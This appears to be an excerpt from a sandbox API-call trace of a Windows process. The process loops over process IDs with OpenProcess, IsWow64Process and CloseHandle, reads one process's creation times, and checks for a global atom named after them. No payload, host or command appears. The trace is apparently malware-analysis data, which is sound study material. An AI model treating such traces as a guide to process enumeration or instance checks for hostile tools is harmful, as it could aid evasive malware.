	[0092.181] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.181] CloseHandle (hObject=0x20c) returned 1
	[0092.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.181] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.181] CloseHandle (hObject=0x20c) returned 1
	[0092.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.182] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.182] CloseHandle (hObject=0x20c) returned 1
	[0092.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.182] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.182] CloseHandle (hObject=0x20c) returned 1
	[0092.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.182] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.182] CloseHandle (hObject=0x20c) returned 1
	[0092.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.182] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.182] CloseHandle (hObject=0x20c) returned 1
	[0092.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.182] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.182] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.183] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.183] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.184] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.184] CloseHandle (hObject=0x20c) returned 1
	[0092.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.185] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.185] CloseHandle (hObject=0x20c) returned 1
	[0092.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.185] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.185] CloseHandle (hObject=0x20c) returned 1
	[0092.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.185] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.185] CloseHandle (hObject=0x20c) returned 1
	[0092.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.185] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.185] CloseHandle (hObject=0x20c) returned 1
	[0092.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.185] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.186] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.186] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.186] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.186] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.186] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.186] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.186] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.187] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.187] CloseHandle (hObject=0x20c) returned 1
	[0092.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.187] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.187] CloseHandle (hObject=0x20c) returned 1
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.271] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.271] CloseHandle (hObject=0x20c) returned 1
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.271] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.271] CloseHandle (hObject=0x20c) returned 1
	[0092.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.272] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.272] CloseHandle (hObject=0x20c) returned 1
	[0092.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.272] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.272] CloseHandle (hObject=0x20c) returned 1
	[0092.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.272] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.272] CloseHandle (hObject=0x20c) returned 1
	[0092.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.272] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.272] CloseHandle (hObject=0x20c) returned 1
	[0092.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.272] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.272] CloseHandle (hObject=0x20c) returned 1
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.273] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.273] CloseHandle (hObject=0x20c) returned 1
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.273] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.273] CloseHandle (hObject=0x20c) returned 1
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.273] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.273] CloseHandle (hObject=0x20c) returned 1
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.273] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.273] CloseHandle (hObject=0x20c) returned 1
	[0092.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.273] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.273] CloseHandle (hObject=0x20c) returned 1
	[0092.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.274] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.274] CloseHandle (hObject=0x20c) returned 1
	[0092.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.274] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.274] CloseHandle (hObject=0x20c) returned 1
	[0092.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.274] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.274] CloseHandle (hObject=0x20c) returned 1
	[0092.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.274] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.274] CloseHandle (hObject=0x20c) returned 1
	[0092.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.274] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.274] CloseHandle (hObject=0x20c) returned 1
	[0092.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.275] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.275] CloseHandle (hObject=0x20c) returned 1
	[0092.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.275] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.275] CloseHandle (hObject=0x20c) returned 1
	[0092.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.275] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.275] CloseHandle (hObject=0x20c) returned 1
	[0092.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.275] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.275] CloseHandle (hObject=0x20c) returned 1
	[0092.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.275] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.275] CloseHandle (hObject=0x20c) returned 1
	[0092.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.276] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.276] CloseHandle (hObject=0x20c) returned 1
	[0092.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.276] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.276] CloseHandle (hObject=0x20c) returned 1
	[0092.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.276] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.276] CloseHandle (hObject=0x20c) returned 1
	[0092.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.276] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.276] CloseHandle (hObject=0x20c) returned 1
	[0092.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.276] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.276] CloseHandle (hObject=0x20c) returned 1
	[0092.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.277] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.277] CloseHandle (hObject=0x20c) returned 1
	[0092.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.277] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.277] CloseHandle (hObject=0x20c) returned 1
	[0092.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.277] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.277] CloseHandle (hObject=0x20c) returned 1
	[0092.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.277] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.277] CloseHandle (hObject=0x20c) returned 1
	[0092.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.278] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.278] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.278] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.278] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.279] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.279] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.279] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.279] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.279] CloseHandle (hObject=0x20c) returned 1
	[0092.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.279] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.279] CloseHandle (hObject=0x20c) returned 1
	[0092.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.363] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.363] CloseHandle (hObject=0x20c) returned 1
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.364] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.364] CloseHandle (hObject=0x20c) returned 1
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.364] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.364] CloseHandle (hObject=0x20c) returned 1
	[0092.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.364] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.364] CloseHandle (hObject=0x20c) returned 1
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.365] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.365] CloseHandle (hObject=0x20c) returned 1
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.365] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.365] CloseHandle (hObject=0x20c) returned 1
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.365] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.365] CloseHandle (hObject=0x20c) returned 1
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.365] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.365] CloseHandle (hObject=0x20c) returned 1
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.365] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.365] CloseHandle (hObject=0x20c) returned 1
	[0092.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.366] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.366] CloseHandle (hObject=0x20c) returned 1
	[0092.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.366] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.366] CloseHandle (hObject=0x20c) returned 1
	[0092.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.366] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.366] CloseHandle (hObject=0x20c) returned 1
	[0092.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.366] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.366] CloseHandle (hObject=0x20c) returned 1
	[0092.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.366] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.366] CloseHandle (hObject=0x20c) returned 1
	[0092.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.367] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.367] CloseHandle (hObject=0x20c) returned 1
